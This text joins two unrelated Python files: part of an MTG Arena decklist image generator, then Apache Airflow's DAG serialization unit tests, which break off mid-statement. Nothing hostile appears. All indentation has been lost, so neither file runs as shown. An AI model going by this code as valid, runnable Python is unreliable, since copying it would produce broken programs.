def generate_decklist_image_from_decklist(self, decklist):
self.download_decklist_card_image(decklist)
decklist_image_array = self.decklist_to_decklist_image_array(decklist)
image = self.generate_decklist_image_from_array(decklist_image_array)
return image
def generate_decklist_image_from_array(self, decklist_image_array):
images = {}
#TODO
#for key0 in decklist_image_array.keys(): # DECK, SIDEBOARD
key0 = Key.DECK
for key1 in decklist_image_array[key0].keys(): # CREATURE, NONCREATURE, LAND
images[key1] = self.generate_image_from_array(decklist_image_array[key0][key1], key1 == Key.LAND)
image = Image.new('RGBA', (
max(images[Key.CREATURE].width, images[Key.NONCREATURE].width) + CardImage.ROW_MARGIN + images[Key.LAND].width,
max(images[Key.CREATURE].height + CardImage.COLUMN_MARGIN + images[Key.NONCREATURE].height, images[Key.LAND].height)
))
image.alpha_composite(images[Key.CREATURE], (0, 0))
image.alpha_composite(images[Key.NONCREATURE], (0, images[Key.CREATURE].height + CardImage.COLUMN_MARGIN))
image.alpha_composite(images[Key.LAND], (max(images[Key.CREATURE].width, images[Key.NONCREATURE].width) + CardImage.ROW_MARGIN, 0))
return image
def generate_image_from_array(self, image_array, is_land=False):
if not is_land:
n = 0
for key in image_array.keys(): # mana value buckets
n = max(n, len(image_array[key]))
decklist_image = Image.new('RGBA', (
CardImage.WIDTH * len(image_array.keys()) + CardImage.ROW_MARGIN * (len(image_array.keys())-1),
CardImage.HEIGHT_MARGIN*(n-1) + CardImage.HEIGHT
))
x = 0
y = 0
for key in image_array.keys():
for card in image_array[key]:
self.composite_card_image(decklist_image, card, (x, y))
y += CardImage.HEIGHT_MARGIN
x += CardImage.WIDTH + CardImage.ROW_MARGIN
y = 0
else:
basic_land_nums = {}
for basic_land_card in image_array[Key.BASIC]:
if basic_land_card.pretty_name in basic_land_nums.keys():
basic_land_nums[basic_land_card.pretty_name] += 1
else:
basic_land_nums[basic_land_card.pretty_name] = 1
n = len(basic_land_nums) + len(image_array[Key.NONBASIC])
decklist_image = Image.new('RGBA', (
CardImage.WIDTH,
CardImage.HEIGHT_MARGIN*(n-1) + CardImage.HEIGHT
))
x = 0
y = 0
processed_basic_land_names = []
for key in image_array.keys(): # BASIC, NONBASIC
for card in image_array[key]:
if key == Key.BASIC:
if card.pretty_name in processed_basic_land_names:
continue
processed_basic_land_names.append(card.pretty_name)
self.composite_card_image(decklist_image, card, (x, y))
if key == Key.BASIC:
self.draw_translucence_rectangle(decklist_image, (round(x+CardImage.WIDTH*3/5), round(y+CardImage.HEIGHT_MARGIN*2/5)), (round(CardImage.WIDTH/3), round(CardImage.HEIGHT_MARGIN/2)), (0, 0, 0, 192))
self.draw_text(decklist_image, 'x '+str(basic_land_nums.get(card.pretty_name)), (x + CardImage.WIDTH*9/10, y + round(CardImage.HEIGHT_MARGIN*6.5/10)))
y += CardImage.HEIGHT_MARGIN
return decklist_image
@classmethod
def normalize_card_name(cls, card_name):
return sub(r'["*/:<>?\\\|]', '-', card_name)
def get_card_image_path(self, name, set, number):
# Normalize the card name
name = self.normalize_card_name(name)
# If a "<card name>.<extension>" file already exists, return its path
for ext in self.downloader.FORMATS.values():
card_image_path = join(self.card_image_cache_dir, name + ext)
if exists(card_image_path):
return card_image_path
# Otherwise, download the card image with CardImageDownloader
card_image_data = self.downloader.get_card_image_data(set, number)
if card_image_data:
with Image.open(BytesIO(card_image_data)) as card_image:
format = card_image.format
if self.downloader.FORMATS.get(format):
card_image_path = join(self.card_image_cache_dir, name + self.downloader.FORMATS[format])
else:
card_image_path = join(self.card_image_cache_dir, name)
with open(card_image_path, 'wb') as card_image_file:
card_image_file.write(card_image_data)
return card_image_path
# Return None if the card image could not be downloaded
return None
def composite_card_image(self, decklist_image, card, xy=(0, 0)):
# If the card image file exists, composite it onto the decklist image
pretty_name = self.ALCHEMY_PREFIX+card.pretty_name if card.is_rebalanced else card.pretty_name
set = card.set
number = self.ALCHEMY_PREFIX+str(card.set_number) if card.is_rebalanced else card.set_number
card_image_path = self.get_card_image_path(pretty_name, set, number)
if card_image_path:
with Image.open(card_image_path) as card_image:
if card_image.width != CardImage.WIDTH or card_image.height != CardImage.HEIGHT:
# Resize if necessary
card_image = card_image.resize((CardImage.WIDTH, CardImage.HEIGHT))
if card_image.format == 'PNG':
return decklist_image.alpha_composite(card_image, xy)
else:
# Not a PNG (no alpha channel), so paste it instead
return decklist_image.paste(card_image, xy)
else:
# If no card image file exists, composite a dummy card image instead
card_image = self.generate_dummy_card_image(pretty_name)
return decklist_image.alpha_composite(card_image, xy)
def save_set_all_images(self, set):
names = self.downloader.save_set_all_images(set, self.card_image_cache_dir)
return names
@classmethod
def draw_translucence_rectangle(cls, decklist_image, xy=(0, 0), size=(0, 0), fill=(0, 0, 0, 0)):
rectangle = Image.new('RGBA', size)
draw = ImageDraw.Draw(rectangle)
draw.rectangle((0, 0) + size, fill)
return decklist_image.alpha_composite(rectangle, xy)
@classmethod
def generate_dummy_card_image(cls, card_name):
outer_size = (0, 0, CardImage.WIDTH, CardImage.HEIGHT)
inner_size = (11, 11, CardImage.WIDTH-11, CardImage.HEIGHT-11)
dummy_card_image = Image.new('RGBA', (CardImage.WIDTH, CardImage.HEIGHT))
draw = ImageDraw.Draw(dummy_card_image)
draw.rectangle(outer_size, (0, 22, 34, 255))
draw.rectangle(inner_size, (192, 192, 192, 255))
font = ImageFont.truetype('meiryo', 12)
draw.text((21, 21), card_name, fill=(0, 0, 0, 255), font=font)
return dummy_card_image
@classmethod
def draw_text(cls, image, text, xy=(0, 0)):
draw = ImageDraw.Draw(image)
font = ImageFont.truetype('meiryo', 32)
# draw.text((xy[0]+3, xy[1]+3), text, fill=(0, 0, 0), font=font, anchor='rm')
draw.text(xy, text, fill=(255, 255, 255), font=font, anchor='rm')
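# --- Usage sketch (not part of the original module) --------------------------
# Typical flow, assuming mtga set data and card images are available locally;
# the user id, set codes, pack counts and decklist below are illustrative:
#
#     g = Generator()
#     pool = g.open_boosters("alice", ["M19"], [6], mode=Mode.RANDOM)
#     print(Generator.cards_to_decklist(pool))          # pool as an Arena-style decklist
#     invalid = g.validate_decklist(my_decklist, pool)  # cards used but missing from the pool
# -----------------------------------------------------------------------------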
|
test_dag_serialization.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Unit tests for stringified DAGs."""
import importlib
import importlib.util
import multiprocessing
import os
import unittest
from datetime import datetime, timedelta, timezone
from glob import glob
from unittest import mock
import pytest
from dateutil.relativedelta import FR, relativedelta
from kubernetes.client import models as k8s
from parameterized import parameterized
from airflow.hooks.base_hook import BaseHook
from airflow.kubernetes.pod_generator import PodGenerator
from airflow.models import DAG, Connection, DagBag, TaskInstance
from airflow.models.baseoperator import BaseOperator, BaseOperatorLink
from airflow.operators.bash import BashOperator
from airflow.security import permissions
from airflow.serialization.json_schema import load_dag_schema_dict
from airflow.serialization.serialized_objects import SerializedBaseOperator, SerializedDAG
from tests.test_utils.mock_operators import CustomOperator, CustomOpLink, GoogleLink
executor_config_pod = k8s.V1Pod(
metadata=k8s.V1ObjectMeta(name="my-name"),
spec=k8s.V1PodSpec(
containers=[
k8s.V1Container(name="base", volume_mounts=[k8s.V1VolumeMount(name="my-vol", mount_path="/vol/")])
]
),
)
serialized_simple_dag_ground_truth = {
"__version": 1,
"dag": {
"default_args": {
"__type": "dict",
"__var": {
"depends_on_past": False,
"retries": 1,
"retry_delay": {"__type": "timedelta", "__var": 300.0},
},
},
"start_date": 1564617600.0,
'_task_group': {
'_group_id': None,
'prefix_group_id': True,
'children': {'bash_task': ('operator', 'bash_task'), 'custom_task': ('operator', 'custom_task')},
'tooltip': '',
'ui_color': 'CornflowerBlue',
'ui_fgcolor': '#000',
'upstream_group_ids': [],
'downstream_group_ids': [],
'upstream_task_ids': [],
'downstream_task_ids': [],
},
"is_paused_upon_creation": False,
"_dag_id": "simple_dag",
"fileloc": None,
"tasks": [
{
"task_id": "bash_task",
"owner": "airflow",
"retries": 1,
"retry_delay": 300.0,
"_downstream_task_ids": [],
"_inlets": [],
"_outlets": [],
"ui_color": "#f0ede4",
"ui_fgcolor": "#000",
"template_fields": ['bash_command', 'env'],
"template_fields_renderers": {'bash_command': 'bash', 'env': 'json'},
"bash_command": "echo {{ task.task_id }}",
'label': 'bash_task',
"_task_type": "BashOperator",
"_task_module": "airflow.operators.bash",
"pool": "default_pool",
"executor_config": {
'__type': 'dict',
'__var': {
"pod_override": {
'__type': 'k8s.V1Pod',
'__var': PodGenerator.serialize_pod(executor_config_pod),
}
},
},
},
{
"task_id": "custom_task",
"retries": 1,
"retry_delay": 300.0,
"_downstream_task_ids": [],
"_inlets": [],
"_outlets": [],
"_operator_extra_links": [{"tests.test_utils.mock_operators.CustomOpLink": {}}],
"ui_color": "#fff",
"ui_fgcolor": "#000",
"template_fields": ['bash_command'],
"template_fields_renderers": {},
"_task_type": "CustomOperator",
"_task_module": "tests.test_utils.mock_operators",
"pool": "default_pool",
'label': 'custom_task',
},
],
"timezone": "UTC",
"_access_control": {
"__type": "dict",
"__var": {
"test_role": {
"__type": "set",
"__var": [permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT],
}
},
},
},
}
ROOT_FOLDER = os.path.realpath(
os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir, os.pardir)
)
def make_example_dags(module_path):
"""Loads DAGs from a module for test."""
dagbag = DagBag(module_path)
return dagbag.dags
def make_simple_dag():
"""Make very simple DAG to verify serialization result."""
with DAG(
dag_id='simple_dag',
default_args={
"retries": 1,
"retry_delay": timedelta(minutes=5),
"depends_on_past": False,
},
start_date=datetime(2019, 8, 1),
is_paused_upon_creation=False,
access_control={"test_role": {permissions.ACTION_CAN_READ, permissions.ACTION_CAN_EDIT}},
) as dag:
CustomOperator(task_id='custom_task')
BashOperator(
task_id='bash_task',
bash_command='echo {{ task.task_id }}',
owner='airflow',
executor_config={"pod_override": executor_config_pod},
)
return {'simple_dag': dag}
def make_user_defined_macro_filter_dag():
"""Make DAGs with user defined macros and filters using locally defined methods.
For Webserver, we do not include ``user_defined_macros`` & ``user_defined_filters``.
The examples here test:
(1) functions can be successfully displayed on UI;
(2) templates with function macros have been rendered before serialization.
"""
def compute_next_execution_date(dag, execution_date):
return dag.following_schedule(execution_date)
default_args = {'start_date': datetime(2019, 7, 10)}
dag = DAG(
'user_defined_macro_filter_dag',
default_args=default_args,
user_defined_macros={
'next_execution_date': compute_next_execution_date,
},
user_defined_filters={'hello': lambda name: 'Hello %s' % name},
catchup=False,
)
BashOperator(
task_id='echo',
bash_command='echo "{{ next_execution_date(dag, execution_date) }}"',
dag=dag,
)
return {dag.dag_id: dag}
def collect_dags(dag_folder=None):
"""Collects DAGs to test."""
dags = {}
dags.update(make_simple_dag())
dags.update(make_user_defined_macro_filter_dag())
if dag_folder:
if isinstance(dag_folder, (list, tuple)):
patterns = dag_folder
else:
patterns = [dag_folder]
else:
patterns = [
"airflow/example_dags",
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
]
for pattern in patterns:
for directory in glob(f"{ROOT_FOLDER}/{pattern}"):
dags.update(make_example_dags(directory))
# Filter subdags as they are stored in same row in Serialized Dag table
dags = {dag_id: dag for dag_id, dag in dags.items() if not dag.is_subdag}
return dags
def serialize_subprocess(queue, dag_folder):
"""Validate pickle in a subprocess."""
dags = collect_dags(dag_folder)
for dag in dags.values():
queue.put(SerializedDAG.to_json(dag))
queue.put(None)
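# Reference sketch (not part of the original tests): the round trip these tests
# exercise boils down to SerializedDAG.to_json()/to_dict() on the scheduler side
# and SerializedDAG.from_json()/from_dict() on the webserver side, e.g.:
#
#     json_blob = SerializedDAG.to_json(make_simple_dag()['simple_dag'])
#     dag = SerializedDAG.from_json(json_blob)
#     assert isinstance(dag, DAG) and dag.dag_id == 'simple_dag'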
class TestStringifiedDAGs(unittest.TestCase):
"""Unit tests for stringified DAGs."""
def setUp(self):
super().setUp()
BaseHook.get_connection = mock.Mock(
return_value=Connection(
extra=(
'{'
'"project_id": "mock", '
'"location": "mock", '
'"instance": "mock", '
'"database_type": "postgres", '
'"use_proxy": "False", '
'"use_ssl": "False"'
'}'
)
)
)
self.maxDiff = None # pylint: disable=invalid-name
def test_serialization(self):
"""Serialization and deserialization should work for every DAG and Operator."""
dags = collect_dags()
serialized_dags = {}
for _, v in dags.items():
dag = SerializedDAG.to_dict(v)
SerializedDAG.validate_schema(dag)
serialized_dags[v.dag_id] = dag
# Compares with the ground truth of JSON string.
self.validate_serialized_dag(serialized_dags['simple_dag'], serialized_simple_dag_ground_truth)
def validate_serialized_dag(self, json_dag, ground_truth_dag):
"""Verify serialized DAGs match the ground truth."""
self.assertTrue(json_dag['dag']['fileloc'].split('/')[-1] == 'test_dag_serialization.py')
json_dag['dag']['fileloc'] = None
def sorted_serialized_dag(dag_dict: dict):
"""
Sorts the "tasks" list and "access_control" permissions in the
serialised dag python dictionary. This is needed as the order of
items should not matter but assertEqual would fail if the order of
items changes in the dag dictionary
"""
dag_dict["dag"]["tasks"] = sorted(dag_dict["dag"]["tasks"], key=lambda x: sorted(x.keys()))
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"] = sorted(
dag_dict["dag"]["_access_control"]["__var"]["test_role"]["__var"]
)
return dag_dict
assert sorted_serialized_dag(ground_truth_dag) == sorted_serialized_dag(json_dag)
@pytest.mark.quarantined
def test_deserialization_across_process(self):
"""A serialized DAG can be deserialized in another process."""
# Since we need to parse the dags twice here (once in the subprocess,
# and once here to get a DAG to compare to) we don't want to load all
# dags.
queue = multiprocessing.Queue()
proc = multiprocessing.Process(target=serialize_subprocess, args=(queue, "airflow/example_dags"))
proc.daemon = True
proc.start()
stringified_dags = {}
while True:
v = queue.get()
if v is None:
break
dag = SerializedDAG.from_json(v)
self.assertTrue(isinstance(dag, DAG))
stringified_dags[dag.dag_id] = dag
dags = collect_dags("airflow/example_dags")
assert set(stringified_dags.keys()) == set(dags.keys())
# Verify deserialized DAGs.
for dag_id in stringified_dags:
self.validate_deserialized_dag(stringified_dags[dag_id], dags[dag_id])
def test_roundtrip_provider_example_dags(self):
dags = collect_dags(
[
"airflow/providers/*/example_dags",
"airflow/providers/*/*/example_dags",
]
)
# Verify deserialized DAGs.
for dag in dags.values():
serialized_dag = SerializedDAG.from_json(SerializedDAG.to_json(dag))
self.validate_deserialized_dag(serialized_dag, dag)
def validate_deserialized_dag(self, serialized_dag, dag):
"""
Verify that all example DAGs work with DAG Serialization by
checking fields between Serialized Dags & non-Serialized Dags
"""
fields_to_check = dag.get_serialized_fields() - {
# Doesn't implement __eq__ properly. Check manually
'timezone',
# Need to check fields in it, to exclude functions
'default_args',
"_task_group",
}
for field in fields_to_check:
assert getattr(serialized_dag, field) == getattr(
dag, field
), f'{dag.dag_id}.{field} does not match'
if dag.default_args:
for k, v in dag.default_args.items():
if callable(v):
# Check we stored _something_.
assert k in serialized_dag.default_args
else:
assert (
v == serialized_dag.default_args[k]
), f'{dag.dag_id}.default_args[{k}] does not match'
assert serialized_dag.timezone.name == dag.timezone.name
for task_id in dag.task_ids:
self.validate_deserialized_task(serialized_dag.get_task(task_id), dag.get_task(task_id))
# Verify that the DAG object has 'full_filepath' attribute
# and is equal to fileloc
assert serialized_dag.full_filepath == dag.fileloc
def validate_deserialized_task(
self,
serialized_task,
task,
):
"""Verify non-airflow operators are casted to BaseOperator."""
assert isinstance(serialized_task, SerializedBaseOperator)
assert not isinstance(task, SerializedBaseOperator)
assert isinstance(task, BaseOperator)
fields_to_check = task.get_serialized_fields() - {
# Checked separately
'_task_type',
'subdag',
# Type is excluded, so don't check it
'_log',
# List vs tuple. Check separately
'template_fields',
# We store the string, real dag has the actual code
'on_failure_callback',
'on_success_callback',
'on_retry_callback',
# Checked separately
'resources',
}
assert serialized_task.task_type == task.task_type
assert set(serialized_task.template_fields) == set(task.template_fields)
assert serialized_task.upstream_task_ids == task.upstream_task_ids
assert serialized_task.downstream_task_ids == task.downstream_task_ids
for field in fields_to_check:
assert getattr(serialized_task, field) == getattr(
task, field
), f'{task.dag.dag_id}.{task.task_id}.{field} does not match'
if serialized_task.resources is None:
assert task.resources is None or task.resources == []
else:
assert serialized_task.resources == task.resources
# Check that for Deserialised task, task.subdag is None for all other Operators
# except for the SubDagOperator where task.subdag is an instance of DAG object
if task.task_type == "SubDagOperator":
assert serialized_task.subdag is not None
assert isinstance(serialized_task.subdag, DAG)
else:
assert serialized_task.subdag is None
@parameterized.expand(
[
(datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
datetime(2019, 8, 1, tzinfo=timezone.utc),
),
]
)
def test_deserialization_start_date(self, dag_start_date, task_start_date, expected_task_start_date):
dag = DAG(dag_id='simple_dag', start_date=dag_start_date)
BaseOperator(task_id='simple_task', dag=dag, start_date=task_start_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_start_date or dag_start_date >= task_start_date:
# If dag.start_date > task.start_date -> task.start_date=dag.start_date
# because of the logic in dag.add_task()
self.assertNotIn("start_date", serialized_dag["dag"]["tasks"][0])
else:
self.assertIn("start_date", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(simple_task.start_date, expected_task_start_date)
def test_deserialization_with_dag_context(self):
with DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1, tzinfo=timezone.utc)) as dag:
BaseOperator(task_id='simple_task')
# should not raise RuntimeError: dictionary changed size during iteration
SerializedDAG.to_dict(dag)
@parameterized.expand(
[
(datetime(2019, 8, 1, tzinfo=timezone.utc), None, datetime(2019, 8, 1, tzinfo=timezone.utc)),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 8, 2, tzinfo=timezone.utc),
datetime(2019, 8, 1, tzinfo=timezone.utc),
),
(
datetime(2019, 8, 1, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
datetime(2019, 7, 30, tzinfo=timezone.utc),
),
]
)
def test_deserialization_end_date(self, dag_end_date, task_end_date, expected_task_end_date):
dag = DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1), end_date=dag_end_date)
BaseOperator(task_id='simple_task', dag=dag, end_date=task_end_date)
serialized_dag = SerializedDAG.to_dict(dag)
if not task_end_date or dag_end_date <= task_end_date:
# If dag.end_date < task.end_date -> task.end_date=dag.end_date
# because of the logic in dag.add_task()
self.assertNotIn("end_date", serialized_dag["dag"]["tasks"][0])
else:
self.assertIn("end_date", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(simple_task.end_date, expected_task_end_date)
@parameterized.expand(
[
(None, None, None),
("@weekly", "@weekly", "0 0 * * 0"),
("@once", "@once", None),
({"__type": "timedelta", "__var": 86400.0}, timedelta(days=1), timedelta(days=1)),
]
)
def test_deserialization_schedule_interval(
self, serialized_schedule_interval, expected_schedule_interval, expected_n_schedule_interval
):
serialized = {
"__version": 1,
"dag": {
"default_args": {"__type": "dict", "__var": {}},
"_dag_id": "simple_dag",
"fileloc": __file__,
"tasks": [],
"timezone": "UTC",
"schedule_interval": serialized_schedule_interval,
},
}
SerializedDAG.validate_schema(serialized)
dag = SerializedDAG.from_dict(serialized)
self.assertEqual(dag.schedule_interval, expected_schedule_interval)
self.assertEqual(dag.normalized_schedule_interval, expected_n_schedule_interval)
@parameterized.expand(
[
(relativedelta(days=-1), {"__type": "relativedelta", "__var": {"days": -1}}),
(relativedelta(month=1, days=-1), {"__type": "relativedelta", "__var": {"month": 1, "days": -1}}),
# Every friday
(relativedelta(weekday=FR), {"__type": "relativedelta", "__var": {"weekday": [4]}}),
# Every second friday
(relativedelta(weekday=FR(2)), {"__type": "relativedelta", "__var": {"weekday": [4, 2]}}),
]
)
def test_roundtrip_relativedelta(self, val, expected):
serialized = SerializedDAG._serialize(val)
self.assertDictEqual(serialized, expected)
round_tripped = SerializedDAG._deserialize(serialized)
self.assertEqual(val, round_tripped)
@parameterized.expand(
[
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
]
)
def test_dag_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag', params=val)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
self.assertIn("params", serialized_dag["dag"])
else:
self.assertNotIn("params", serialized_dag["dag"])
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
self.assertEqual(expected_val, deserialized_dag.params)
self.assertEqual(expected_val, deserialized_simple_task.params)
@parameterized.expand(
[
(None, {}),
({"param_1": "value_1"}, {"param_1": "value_1"}),
]
)
def test_task_params_roundtrip(self, val, expected_val):
"""
Test that params work both on Serialized DAGs & Tasks
"""
dag = DAG(dag_id='simple_dag')
BaseOperator(task_id='simple_task', dag=dag, params=val, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if val:
self.assertIn("params", serialized_dag["dag"]["tasks"][0])
else:
self.assertNotIn("params", serialized_dag["dag"]["tasks"][0])
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_simple_task = deserialized_dag.task_dict["simple_task"]
self.assertEqual(expected_val, deserialized_simple_task.params)
def test_extra_serialized_field_and_operator_links(self):
"""
Assert that the extra serialized field exists and that OperatorLinks defined in Plugins
as well as built-in Operator Links work.
This test also depends on GoogleLink() being registered as a plugin
in tests/plugins/test_plugin.py.
The test verifies that if an extra operator link is registered in a plugin via
``operator_extra_links`` and the same link is also defined on the Operator in
``BaseOperator.operator_extra_links``, the correct extra link is used.
"""
test_date = datetime(2019, 8, 1)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command="true")
serialized_dag = SerializedDAG.to_dict(dag)
self.assertIn("bash_command", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(getattr(simple_task, "bash_command"), "true")
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
self.assertEqual(
serialized_dag["dag"]["tasks"][0]["_operator_extra_links"],
[{'tests.test_utils.mock_operators.CustomOpLink': {}}],
)
# Test all the extra_links are set
self.assertCountEqual(simple_task.extra_links, ['Google Custom', 'airflow', 'github', 'google'])
ti = TaskInstance(task=simple_task, execution_date=test_date)
ti.xcom_push('search_query', "dummy_value_1")
# Test Deserialized inbuilt link
custom_inbuilt_link = simple_task.get_extra_links(test_date, CustomOpLink.name)
self.assertEqual('http://google.com/custom_base_link?search=dummy_value_1', custom_inbuilt_link)
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
self.assertEqual("https://www.google.com", google_link_from_plugin)
def test_extra_operator_links_logs_error_for_non_registered_extra_links(self):
"""
Assert that when an OperatorLink is neither registered via Plugins nor a built-in
Operator Link, the DAG can still be deserialized (no exception is raised) and an
error is logged instead.
"""
class TaskStateLink(BaseOperatorLink):
"""OperatorLink not registered via Plugins nor a built-in OperatorLink"""
name = 'My Link'
def get_link(self, operator, dttm):
return 'https://www.google.com'
class MyOperator(BaseOperator):
"""Just a DummyOperator using above defined Extra Operator Link"""
operator_extra_links = [TaskStateLink()]
def execute(self, context):
pass
with DAG(dag_id='simple_dag', start_date=datetime(2019, 8, 1)) as dag:
MyOperator(task_id='blah')
serialized_dag = SerializedDAG.to_dict(dag)
with self.assertLogs("airflow.serialization.serialized_objects", level="ERROR") as log_output:
SerializedDAG.from_dict(serialized_dag)
received_logs = log_output.output[0]
expected_err_msg = (
"Operator Link class 'tests.serialization.test_dag_serialization.TaskStateLink' "
"not registered"
)
assert expected_err_msg in received_logs
def test_extra_serialized_field_and_multiple_operator_links(self):
"""
Assert that the extra serialized field exists and that OperatorLinks defined in Plugins
as well as built-in Operator Links work.
This test also depends on GoogleLink() being registered as a plugin
in tests/plugins/test_plugin.py.
The test verifies that if extra operator links are registered in a plugin via
``operator_extra_links`` and the same links are also defined on the Operator in
``BaseOperator.operator_extra_links``, the correct extra links are used.
"""
test_date = datetime(2019, 8, 1)
dag = DAG(dag_id='simple_dag', start_date=test_date)
CustomOperator(task_id='simple_task', dag=dag, bash_command=["echo", "true"])
serialized_dag = SerializedDAG.to_dict(dag)
self.assertIn("bash_command", serialized_dag["dag"]["tasks"][0])
dag = SerializedDAG.from_dict(serialized_dag)
simple_task = dag.task_dict["simple_task"]
self.assertEqual(getattr(simple_task, "bash_command"), ["echo", "true"])
#########################################################
# Verify Operator Links work with Serialized Operator
#########################################################
# Check Serialized version of operator link only contains the inbuilt Op Link
self.assertEqual(
serialized_dag["dag"]["tasks"][0]["_operator_extra_links"],
[
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 0}},
{'tests.test_utils.mock_operators.CustomBaseIndexOpLink': {'index': 1}},
],
)
# Test all the extra_links are set
self.assertCountEqual(
simple_task.extra_links,
['BigQuery Console #1', 'BigQuery Console #2', 'airflow', 'github', 'google'],
)
ti = TaskInstance(task=simple_task, execution_date=test_date)
ti.xcom_push('search_query', ["dummy_value_1", "dummy_value_2"])
# Test Deserialized inbuilt link #1
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #1")
self.assertEqual('https://console.cloud.google.com/bigquery?j=dummy_value_1', custom_inbuilt_link)
# Test Deserialized inbuilt link #2
custom_inbuilt_link = simple_task.get_extra_links(test_date, "BigQuery Console #2")
self.assertEqual('https://console.cloud.google.com/bigquery?j=dummy_value_2', custom_inbuilt_link)
# Test Deserialized link registered via Airflow Plugin
google_link_from_plugin = simple_task.get_extra_links(test_date, GoogleLink.name)
self.assertEqual("https://www.google.com", google_link_from_plugin)
class ClassWithCustomAttributes:
"""
    Class for testing purposes: allows creating objects with custom attributes in a single statement.
"""
def __init__(self, **kwargs):
for key, value in kwargs.items():
setattr(self, key, value)
def __str__(self):
return "{}({})".format(self.__class__.__name__, str(self.__dict__))
def __repr__(self):
return self.__str__()
def __eq__(self, other):
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self.__eq__(other)
@parameterized.expand(
[
(None, None),
([], []),
({}, {}),
("{{ task.task_id }}", "{{ task.task_id }}"),
(["{{ task.task_id }}", "{{ task.task_id }}"]),
({"foo": "{{ task.task_id }}"}, {"foo": "{{ task.task_id }}"}),
({"foo": {"bar": "{{ task.task_id }}"}}, {"foo": {"bar": "{{ task.task_id }}"}}),
(
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
[{"foo1": {"bar": "{{ task.task_id }}"}}, {"foo2": {"bar": "{{ task.task_id }}"}}],
),
(
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}},
{"foo": {"bar": {"{{ task.task_id }}": ["sar"]}}},
),
(
ClassWithCustomAttributes(
att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"]
),
"ClassWithCustomAttributes("
"{'att1': '{{ task.task_id }}', 'att2': '{{ task.task_id }}', 'template_fields': ['att1']})",
),
(
ClassWithCustomAttributes(
nested1=ClassWithCustomAttributes(
att1="{{ task.task_id }}", att2="{{ task.task_id }}", template_fields=["att1"]
),
nested2=ClassWithCustomAttributes(
att3="{{ task.task_id }}", att4="{{ task.task_id }}", template_fields=["att3"]
),
template_fields=["nested1"],
),
"ClassWithCustomAttributes("
"{'nested1': ClassWithCustomAttributes({'att1': '{{ task.task_id }}', "
"'att2': '{{ task.task_id }}', 'template_fields': ['att1']}), "
"'nested2': ClassWithCustomAttributes({'att3': '{{ task.task_id }}', 'att4': "
"'{{ task.task_id }}', 'template_fields': ['att3']}), 'template_fields': ['nested1']})",
),
]
)
def test_templated_fields_exist_in_serialized_dag(self, templated_field, expected_field):
"""
Test that templated_fields exists for all Operators in Serialized DAG
Since we don't want to inflate arbitrary python objects (it poses a RCE/security risk etc.)
        we want to check that non-"basic" objects are turned into strings after deserializing.
"""
dag = DAG("test_serialized_template_fields", start_date=datetime(2019, 8, 1))
with dag:
BashOperator(task_id="test", bash_command=templated_field)
serialized_dag = SerializedDAG.to_dict(dag)
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
deserialized_test_task = deserialized_dag.task_dict["test"]
self.assertEqual(expected_field, getattr(deserialized_test_task, "bash_command"))
def test_dag_serialized_fields_with_schema(self):
"""
Additional Properties are disabled on DAGs. This test verifies that all the
keys in DAG.get_serialized_fields are listed in Schema definition.
"""
dag_schema: dict = load_dag_schema_dict()["definitions"]["dag"]["properties"]
        # The parameters we add manually in Serialization need to be ignored
ignored_keys: set = {"is_subdag", "tasks"}
dag_params: set = set(dag_schema.keys()) - ignored_keys
self.assertEqual(set(DAG.get_serialized_fields()), dag_params)
def test_operator_subclass_changing_base_defaults(self):
assert (
